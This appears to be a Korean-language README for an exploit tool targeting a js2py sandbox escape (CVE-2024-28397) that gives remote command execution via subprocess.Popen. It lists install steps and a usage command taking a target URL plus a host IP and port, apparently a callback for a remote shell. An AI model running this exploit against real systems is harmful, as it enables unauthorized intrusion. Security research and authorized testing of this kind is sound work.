
js2py <= 0.74 샌드박스 탈출 (CVE-2024-28397)
js2py <= 0.74에서 샌드박스 탈출을 통한 원격 명령 실행(RCE) 익스플로잇.
안전하지 않은 JavaScript 평가를 통해 호스트 시스템에서 임의의 코드를 실행할 수 있습니다.
subprocess.Popen을 통한 명령 실행의존성:
pip install -r requirements.txt
python3 exploit.py -U http://target_url -H IP -P PUERTO
이 프로젝트는 교육 목적 및 승인된 보안 감사 전용으로 제공됩니다.
저자는 이 도구의 오용에 대해 책임을 지지 않습니다.